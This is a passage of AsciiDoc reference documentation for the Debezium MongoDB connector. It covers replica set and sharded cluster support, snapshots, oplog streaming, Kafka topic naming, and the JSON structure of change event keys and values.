link:https:\/\/docs.mongodb.com\/manual\/changeStreams\/[Change Streams]\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-mongodb-connectors-work\n\/\/ Title: How {prodname} MongoDB connectors work\n[[how-the-mongodb-connector-works]]\n== How the MongoDB connector works\n\nAn overview of the MongoDB topologies that the connector supports is useful for planning your application.\n\nWhen a MongoDB connector is configured and deployed, it starts by connecting to the MongoDB servers at the seed addresses, and determines the details about each of the available replica sets.\nSince each replica set has its own independent oplog, the connector will try to use a separate task for each replica set.\nThe connector can limit the maximum number of tasks it will use, and if not enough tasks are available the connector will assign multiple replica sets to each task, although the task will still use a separate thread for each replica set.\n\n[NOTE]\n====\nWhen running the connector against a sharded cluster, use a value of `tasks.max` that is greater than the number of replica sets.\nThis will allow the connector to create one task for each replica set, and will let Kafka Connect coordinate, distribute, and manage the tasks across all of the available worker processes.\n====\n\nifdef::product[]\nThe following topics provide details about how the {prodname} MongoDB connector works:\n\n* xref:mongodb-topologies-supported-by-debezium-connectors[]\n* xref:how-debezium-mongodb-connectors-use-logical-names-for-replica-sets-and-sharded-clusters[]\n* xref:how-debezium-mongodb-connectors-perform-snapshots[]\n* xref:how-the-debezium-mongodb-connector-streams-change-event-records[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-mongodb-change-event-records[]\n* xref:how-event-keys-control-topic-partitioning-for-the-debezium-mongodb-connector[]\n* xref:debezium-mongodb-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: mongodb-topologies-supported-by-debezium-connectors\n\/\/ Title: MongoDB topologies supported by {prodname} connectors\n[[supported-mongodb-topologies]]\n=== Supported MongoDB topologies\n\nThe MongoDB connector supports the following MongoDB topologies:\n\n[[mongodb-replicaset]]\nMongoDB replica set::\nThe {prodname} MongoDB connector can capture changes from a single https:\/\/docs.mongodb.com\/manual\/replication\/[MongoDB replica set].\nProduction replica sets require a minimum of https:\/\/docs.mongodb.com\/manual\/core\/replica-set-architecture-three-members\/[at least three members].\n+\nTo use the MongoDB connector with a replica set, provide the addresses of one or more replica set servers as _seed addresses_ through the connector's `mongodb.hosts` property.\nThe connector will use these seeds to connect to the replica set, and then once connected will get from the replica set the complete set of members and which member is primary.\nThe connector will start a task to connect to the primary and capture the changes from the primary's oplog.\nWhen the replica set elects a new primary, the task will automatically switch over to the new primary.\n+\n[NOTE]\n====\nWhen MongoDB is fronted by a proxy (such as with Docker on OS X or Windows), then when a client connects to the replica set and discovers the members, the MongoDB client will exclude the proxy as a valid member and will attempt and fail to connect directly to the members rather than go through the proxy.\n\nIn such a case, set the connector's optional `mongodb.members.auto.discover` configuration property to `false` to instruct the connector to forgo membership discovery and instead simply use the first seed address (specified via the `mongodb.hosts` property) as the primary node.\nThis may work, but still make cause issues when election occurs.\n====\n\n[[mongodb-sharded-cluster]]\nMongoDB sharded cluster::\nA https:\/\/docs.mongodb.com\/manual\/sharding\/[MongoDB sharded cluster] consists of:\n* One or more _shards_, each deployed as a replica set;\n* A separate replica set that acts as the cluster's _configuration server_\n* One or more _routers_ (also called `mongos`) to which clients connect and that routes requests to the appropriate shards\n+\nTo use the MongoDB connector with a sharded cluster, configure the connector with the host addresses of the _configuration server_ replica set. When the connector connects to this replica set, it discovers that it is acting as the configuration server for a sharded cluster, discovers the information about each replica set used as a shard in the cluster, and will then start up a separate task to capture the changes from each replica set. If new shards are added to the cluster or existing shards removed, the connector will automatically adjust its tasks accordingly.\n\n[[mongodb-standalone-server]]\nMongoDB standalone server::\nThe MongoDB connector is not capable of monitoring the changes of a standalone MongoDB server, since standalone servers do not have an oplog.\nThe connector will work if the standalone server is converted to a replica set with one member.\n\n[NOTE]\n====\nMongoDB does not recommend running a standalone server in production.\nFor more information, see the https:\/\/docs.mongodb.com\/manual\/core\/replica-set-architectures\/[MongoDB documentation].\n====\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} MongoDB connectors use logical names for replica sets and sharded clusters\n\/\/ ModuleID: how-debezium-mongodb-connectors-use-logical-names-for-replica-sets-and-sharded-clusters\n[[mongodb-logical-connector-name]]\n=== Logical connector name\n\nThe connector configuration property `mongodb.name` serves as a _logical name_ for the MongoDB replica set or sharded cluster.\nThe connector uses the logical name in a number of ways: as the prefix for all topic names, and as a unique identifier when recording the oplog\/change stream position of each replica set.\n\nYou should give each MongoDB connector a unique logical name that meaningfully describes the source MongoDB system.\nWe recommend logical names begin with an alphabetic or underscore character, and remaining characters that are alphanumeric or underscore.\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} MongoDB connectors perform snapshots\n\/\/ ModuleID: how-debezium-mongodb-connectors-perform-snapshots\n[[mongodb-performing-a-snapshot]]\n=== Performing a snapshot\n\nWhen a task starts up using a replica set, it uses the connector's logical name and the replica set name to find an _offset_ that describes the position where the connector previously stopped reading changes.\nIf an offset can be found and it still exists in the oplog, then the task immediately proceeds with xref:{link-mongodb-connector}#mongodb-streaming-changes[streaming changes], starting at the recorded offset position.\n\nHowever, if no offset is found or if the oplog no longer contains that position, the task must first obtain the current state of the replica set contents by performing a _snapshot_.\nThis process starts by recording the current position of the oplog and recording that as the offset (along with a flag that denotes a snapshot has been started).\nThe task will then proceed to copy each collection, spawning as many threads as possible (up to the value of the `snapshot.max.threads` configuration property) to perform this work in parallel.\nThe connector will record a separate _read event_ for each document it sees, and that read event will contain the object's identifier, the complete state of the object, and _source_ information about the MongoDB replica set where the object was found.\nThe source information will also include a flag that denotes the event was produced during a snapshot.\n\nThis snapshot will continue until it has copied all collections that match the connector's filters.\nIf the connector is stopped before the tasks' snapshots are completed, upon restart the connector begins the snapshot again.\n\n[NOTE]\n====\nTry to avoid task reassignment and reconfiguration while the connector performs snapshots of any replica sets.\nThe connector generates log messages to report on the progress of the snapshot.\nTo provide for the greatest control, run a separate Kafka Connect cluster for each connector.\n====\n\n\/\/ Type: concept\n[id=\"mongodb-ad-hoc-snapshots\"]\n==== Ad hoc snapshots\n\nifdef::product[]\n[IMPORTANT]\n====\nAd hoc snapshots are a Technology Preview feature for the {prodname} MongoDB connector.\nTechnology Preview features are not supported with Red Hat production service-level agreements (SLAs) and might not be functionally complete;\ntherefore, Red Hat does not recommend implementing any Technology Preview features in production environments.\nThis Technology Preview feature provides early access to upcoming product innovations, enabling you to test functionality and provide feedback during the development process.\nFor more information about support scope, see link:https:\/\/access.redhat.com\/support\/offerings\/techpreview\/[Technology Preview Features Support Scope].\n====\nendif::product[]\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-ad-hoc-snapshots.adoc[leveloffset=+3]\n\n\/\/ Type: concept\n[id=\"mongodb-incremental-snapshots\"]\n==== Incremental snapshots\n\nifdef::product[]\n[IMPORTANT]\n====\nIncremental snapshots are a Technology Preview feature for the {prodname} MongoDB connector.\nTechnology Preview features are not supported with Red Hat production service-level agreements (SLAs) and might not be functionally complete;\ntherefore, Red Hat does not recommend implementing any Technology Preview features in production environments.\nThis Technology Preview feature provides early access to upcoming product innovations, enabling you to test functionality and provide feedback during the development process.\nFor more information about support scope, see link:https:\/\/access.redhat.com\/support\/offerings\/techpreview\/[Technology Preview Features Support Scope].\n====\nendif::product[]\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-incremental-snapshot.adoc[leveloffset=+3]\n\n[NOTE]\n====\nIncremental snapshots are currently supported for single replica set deployments only.\nifdef::community[]\nThis limitation will be removed in the next version.\nendif::community[]\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: how-the-debezium-mongodb-connector-streams-change-event-records\n\/\/ Title: How the {prodname} MongoDB connector streams change event records\n[[mongodb-streaming-changes]]\n=== Streaming changes\n[[mongodb-tailing-the-oplog]]\n\nAfter the connector task for a replica set records an offset, it uses the offset to determine the position in the oplog where it should start streaming changes.\nThe task then (depending on the configuration) either connects to the replica set's primary node or connects to a replica-set-wide change stream and starts streaming changes from that position.\nIt processes all of create, insert, and delete operations, and converts them into {prodname} xref:{link-mongodb-connector}#mongodb-events[change events].\nEach change event includes the position in the oplog where the operation was found, and the connector periodically records this as its most recent offset.\nThe interval at which the offset is recorded is governed by link:https:\/\/kafka.apache.org\/documentation\/#offset.flush.interval.ms[`offset.flush.interval.ms`], which is a Kafka Connect worker configuration property.\n\nWhen the connector is stopped gracefully, the last offset processed is recorded so that, upon restart, the connector will continue exactly where it left off.\nIf the connector's tasks terminate unexpectedly, however, then the tasks may have processed and generated events after it last records the offset but before the last offset is recorded; upon restart, the connector begins at the last _recorded_ offset, possibly generating some the same events that were previously generated just prior to the crash.\n\n[NOTE]\n====\nWhen everything is operating nominally, Kafka consumers will actually see every message *_exactly once_*. However, when things go wrong Kafka can only guarantee consumers will see every message *_at least once_*. Therefore, your consumers need to anticipate seeing messages more than once.\n====\n\nAs mentioned above, the connector tasks always use the replica set's primary node to stream changes from the oplog, ensuring that the connector sees the most up-to-date operations as possible and can capture the changes with lower latency than if secondaries were to be used instead. When the replica set elects a new primary, the connector immediately stops streaming changes, connects to the new primary, and starts streaming changes from the new primary node at the same position. Likewise, if the connector experiences any problems communicating with the replica set members, it tries to reconnect, by using exponential backoff so as to not overwhelm the replica set, and once connected it continues streaming changes from where it last left off. In this way, the connector is able to dynamically adjust to changes in replica set membership and automatically handle communication failures.\n\nTo summarize, the MongoDB connector continues running in most situations. Communication problems might cause the connector to wait until the problems are resolved.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-mongodb-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} MongoDB change event records\n[[mongodb-topic-names]]\n=== Topic names\n\nThe MongoDB connector writes events for all insert, update, and delete operations to documents in each collection to a single Kafka topic.\nThe name of the Kafka topics always takes the form _logicalName_._databaseName_._collectionName_, where _logicalName_ is the xref:{link-mongodb-connector}#mongodb-logical-connector-name[logical name] of the connector as specified with the `mongodb.name` configuration property, _databaseName_ is the name of the database where the operation occurred, and _collectionName_ is the name of the MongoDB collection in which the affected document existed.\n\nFor example, consider a MongoDB replica set with an `inventory` database that contains four collections: `products`, `products_on_hand`, `customers`, and `orders`.\nIf the connector monitoring this database were given a logical name of `fulfillment`, then the connector would produce events on these four Kafka topics:\n\n* `fulfillment.inventory.products`\n* `fulfillment.inventory.products_on_hand`\n* `fulfillment.inventory.customers`\n* `fulfillment.inventory.orders`\n\nNotice that the topic names do not incorporate the replica set name or shard name.\nAs a result, all changes to a sharded collection (where each shard contains a subset of the collection's documents) all go to the same Kafka topic.\n\nYou can set up Kafka to {link-kafka-docs}.html#basic_ops_add_topic[auto-create] the topics as they are needed.\nIf not, then you must use Kafka administration tools to create the topics before starting the connector.\n\n\/\/ Type: concept\n\/\/ ModuleID: how-event-keys-control-topic-partitioning-for-the-debezium-mongodb-connector\n\/\/ Title: How event keys control topic partitioning for the {prodname} MongoDB connector\n[[mongodb-partitions]]\n=== Partitions\n\nThe MongoDB connector does not make any explicit determination about how to partition topics for events.\nInstead, it allows Kafka to determine how to partition topics based on event keys.\nYou can change Kafka's partitioning logic by defining the name of the `Partitioner` implementation in the Kafka Connect worker configuration.\n\nKafka maintains total order only for events written to a single topic partition.\nPartitioning the events by key does mean that all events with the same key always go to the same partition.\nThis ensures that all events for a specific document are always totally ordered.\n\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-mongodb-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} MongoDB connector-generated events that represent transaction boundaries\n[[mongodb-transaction-metadata]]\n=== Transaction Metadata\n\n{prodname} can generate events that represents transaction metadata boundaries and enrich change data event messages.\n\n[NOTE]\n.Limits on when {prodname} receives transaction metadata\n====\n{prodname} registers and receives metadata only for transactions that occur after you deploy the connector.\nMetadata for transactions that occur before you deploy the connector is not available.\n====\n\nFor every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n`status`:: `BEGIN` or `END`\n`id`:: String representation of unique transaction identifier.\n`event_count` (for `END` events):: Total number of events emitted by the transaction.\n`data_collections` (for `END` events):: An array of pairs of `data_collection` and `event_count` that provides number of events emitted by changes originating from given data collection.\n\nThe following example shows a typical message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"1462833718356672513\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"1462833718356672513\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"rs0.testDB.collectiona\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"rs0.testDB.collectionb\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nUnless overridden via the xref:{link-mongodb-connector}#mongodb-property-topic-transaction[`topic.transaction`] option,\ntransaction events are written to the topic named xref:mongodb-property-mongodb-name[`_<mongodb.name>_`]`.transaction`.\n\n.Change data event enrichment\nWhen transaction metadata is enabled, the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n`id`:: String representation of unique transaction identifier.\n`total_order`:: The absolute position of the event among all events generated by the transaction.\n`data_collection_order`:: The per-data collection position of the event among all events that were emitted by the transaction.\n\nFollowing is an example of what a message looks like:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"patch\": null,\n \"after\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"},\\\"first_name\\\" : \\\"Anne\\\",\\\"last_name\\\" : \\\"Kretchmar\\\",\\\"email\\\" : \\\"annek@noanswer.org\\\"}\",\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"1462833718356672513\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-mongodb-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} MongoDB connector data change events\n[[mongodb-events]]\n== Data change events\n\nThe {prodname} MongoDB connector generates a data change event for each document-level operation that inserts, updates, or deletes data. Each event contains a key and a value. The structure of the key and the value depends on the collection that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the key for the document that was changed.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the document that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the document that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the document that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating collection. See xref:{link-mongodb-connector}#mongodb-topic-names[topic names].\n\n[WARNING]\n====\nThe MongoDB connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the database and collection names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a collection name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\n\nifdef::product[]\nFor more information, see the following topics:\n\n* xref:about-keys-in-debezium-mongodb-change-events[]\n* xref:about-values-in-debezium-mongodb-change-events[]\nendif::product[]\n\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-mongodb-change-events\n\/\/ Title: About keys in {prodname} MongoDB change events\n[[mongodb-change-events-key]]\n=== Change event keys\n\nA change event's key contains the schema for the changed document's key and the changed document's actual key. For a given collection, both the schema and its corresponding payload contain a single `id` field.\nThe value of this field is the document's identifier represented as a string that is derived from link:https:\/\/docs.mongodb.com\/manual\/reference\/mongodb-extended-json\/[MongoDB extended JSON serialization strict mode].\n\nConsider a connector with a logical name of `fulfillment`, a replica set containing an `inventory` database, and a `customers` collection that contains documents such as the following.\n\n.Example document\n[source,json,indent=0]\n----\n {\n \"_id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n }\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` collection has the same event key schema. For as long as the `customers` collection has the previous definition, every change event that captures a change to the `customers` collection has the following key structure. In JSON, it looks like this:\n\n[source,json,indent=0]\n----\n {\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"name\": \"fulfillment.inventory.customers.Key\", \/\/ <2>\n \"optional\": false, \/\/ <3>\n \"fields\": [ \/\/ <4>\n {\n \"field\": \"id\",\n \"type\": \"string\",\n \"optional\": false\n }\n ]\n },\n \"payload\": { \/\/ <5>\n \"id\": \"1004\"\n }\n }\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`fulfillment.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the key for the document that was changed. Key schema names have the format _connector-name_._database-name_._collection-name_.`Key`. In this example: +\n\n* `fulfillment` is the name of the connector that generated this event. +\n* `inventory` is the database that contains the collection that was changed. +\n* `customers` is the collection that contains the document that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a document does not have a key.\n\n|4\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|5\n|`payload`\n|Contains the key for the document for which this change event was generated. In this example, the key contains a single `id` field of type `string` whose value is `1004`.\n\n|===\n\nThis example uses a document with an integer identifier, but any valid MongoDB document identifier works the same way, including a document identifier. For a document identifier, an event key's `payload.id` value is a string that represents the updated document's original `_id` field as a MongoDB extended JSON serialization that uses strict mode. The following table provides examples of how different types of `_id` fields are represented.\n\n.Examples of representing document `_id` fields in event key payloads\n[options=\"header\",role=\"code-wordbreak-col2 code-wordbreak-col3\"]\n|===\n|Type |MongoDB `_id` Value|Key's payload\n|Integer |1234|`{ \"id\" : \"1234\" }`\n|Float |12.34|`{ \"id\" : \"12.34\" }`\n|String |\"1234\"|`{ \"id\" : \"\\\"1234\\\"\" }`\n|Document|`{ \"hi\" : \"kafka\", \"nums\" : [10.0, 100.0, 1000.0] }`|`{ \"id\" : \"{\\\"hi\\\" : \\\"kafka\\\", \\\"nums\\\" : [10.0, 100.0, 1000.0]}\" }`\n|ObjectId |`ObjectId(\"596e275826f08b2730779e1f\")`|`{ \"id\" : \"{\\\"$oid\\\" : \\\"596e275826f08b2730779e1f\\\"}\" }`\n|Binary |`BinData(\"a2Fma2E=\",0)`|`{ \"id\" : \"{\\\"$binary\\\" : \\\"a2Fma2E=\\\", \\\"$type\\\" : \\\"00\\\"}\" }`\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-mongodb-change-events\n\/\/ Title: About values in {prodname} MongoDB change events\n[[mongodb-change-events-value]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample document that was used to show an example of a change event key:\n\n\n.Example document\n[source,json,indent=0]\n----\n {\n \"_id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n }\n----\n\nThe value portion of a change event for a change to this document is described for each event type:\n\n* <<mongodb-create-events,_create_ events>>\n* <<mongodb-update-events,_update_ events>>\n* <<mongodb-delete-events,_delete_ events>>\n* <<mongodb-tombstone-events,Tombstone events>>\n\n[id=\"mongodb-create-events\"]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` collection:\n\n[source,json,options=\"nowrap\",indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"name\": \"io.debezium.data.Json\", \/\/ <2>\n \"version\": 1,\n \"field\": \"after\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"name\": \"io.debezium.data.Json\",\n \"version\": 1,\n \"field\": \"patch\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"rs\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"collection\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ord\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"h\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.mongo.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"dbserver1.inventory.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"after\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"},\\\"first_name\\\" : \\\"Anne\\\",\\\"last_name\\\" : \\\"Kretchmar\\\",\\\"email\\\" : \\\"annek@noanswer.org\\\"}\", \/\/ <6>\n \"patch\": null,\n \"source\": { \/\/ <7>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 31,\n \"h\": 1546547425148721999\n },\n \"op\": \"c\", \/\/ <8>\n \"ts_ms\": 1558965515240 \/\/ <9>\n }\n }\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular collection.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`io.debezium.data.Json` is the schema for the payload's `after`, `patch`, and `filter` fields. This schema is specific to the `customers` collection. A _create_ event is the only kind of event that contains an `after` field. An _update_ event contains a `filter` field and a `patch` field. A _delete_ event contains a `filter` field, but not an `after` field nor a `patch` field.\n\n|3\n|`name`\na|`io.debezium.connector.mongo.Source` is the schema for the payload's `source` field. This schema is specific to the MongoDB connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`dbserver1.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `dbserver1` is the connector name, `inventory` is the database, and `customers` is the collection. This schema is specific to the collection.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the documents they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the xref:{link-avro-serialization}#avro-serialization[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`after`\n|An optional field that specifies the state of the document after the event occurred. In this example, the `after` field contains the values of the new document's `\\_id`, `first_name`, `last_name`, and `email` fields. The `after` value is always a string. By convention, it contains a JSON representation of the document. MongoDB's oplog entries contain the full state of a document only for _create_ events and also for `update` events, when the `capture.mode` option is set to `change_streams_update_full`; in other words, a _create_ event is the only kind of event that contains an _after_ field, when the `capture.mode` option is set either to `oplog` or `change_streams`.\n\n|7\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contain the new document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifier of the MongoDB operation, which depends on the version of MongoDB. It is either the `h` field in the oplog event, or a field named `stxnid`, which represents the `lsid` and `txnNumber` fields from the oplog event (oplog capture mode only).\n* Unique identifiers of the MongoDB session `lsid` and transaction number `txnNumber` in case the change was executed inside a transaction (change streams capture mode only).\n\n|8\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a document. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|9\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[id=\"mongodb-update-events\"]\n=== _update_ events\n\n==== Oplog capture mode (legacy)\nThe value of a change event for an update in the sample `customers` collection has the same schema as a _create_ event for that collection. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. An _update_ event does not have an `after` value. Instead, it has these two fields:\n\n* `patch` is a string field that contains the JSON representation of the idempotent update operation\n\n* `filter` is a string field that contains the JSON representation of the selection criteria for the update. The `filter` string can include multiple shard key fields for sharded collections.\n\nHere is an example of a change event value in an event that the connector generates for an update in the `customers` collection:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"op\": \"u\", \/\/ <1>\n \"ts_ms\": 1465491461815, \/\/ <2>\n \"patch\": \"{\\\"$set\\\":{\\\"first_name\\\":\\\"Anne Marie\\\"}}\", \/\/ <3>\n \"filter\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"}}\", \/\/ <4>\n \"source\": { \/\/ <5>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 6,\n \"h\": 1546547425148721999\n }\n }\n }\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `u` indicates that the operation updated a document.\n\n|2\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|3\n|`patch`\n|Contains the JSON string representation of the actual MongoDB idempotent change to the document. In this example, the update changed the `first_name` field to a new value. +\n +\nAn _update_ event value does not contain an `after` field.\n\n|4\n|`filter`\n|Contains the JSON string representation of the MongoDB selection criteria that was used to identify the document to be updated.\n\n|5\n|`source`\na|Mandatory field that describes the source metadata for the event. This field contains the same information as a _create_ event for the same collection, but the values are different since this event is from a different position in the oplog. The source metadata includes:\n\n* {prodname} version.\n* Name of the connector that generated the event.\n* Logical name of the MongoDB replica set, which forms a namespace for generated events and is used in Kafka topic names to which the connector writes.\n* Names of the collection and database that contain the updated document.\n* If the event was part of a snapshot.\n* Timestamp for when the change was made in the database and ordinal of the event within the timestamp.\n* Unique identifier of the MongoDB operation, which depends on the version of MongoDB. It is either the `h` field in the oplog event, or a field named `stxnid`, which represents the `lsid` and `txnNumber` fields from the oplog event.\n\n|===\n\n[WARNING]\n====\nIn a {prodname} change event, MongoDB provides the content of the `patch` field. The format of this field depends on the version of the MongoDB database. Consequently, be prepared for potential changes to the format when you upgrade to a newer MongoDB database version. Examples in this document were obtained from MongoDB 3.4, In your application, event formats might be different.\n====\n\n[NOTE]\n====\nIn MongoDB's oplog, _update_ events do not contain the _before_ or _after_ states of the changed document. Consequently, it is not possible for a {prodname} connector to provide this information. However, a {prodname} connector provides a document's starting state in _create_ and _read_ events. Downstream consumers of the stream can reconstruct document state by keeping the latest state for each document and comparing the state in a new event with the saved state. 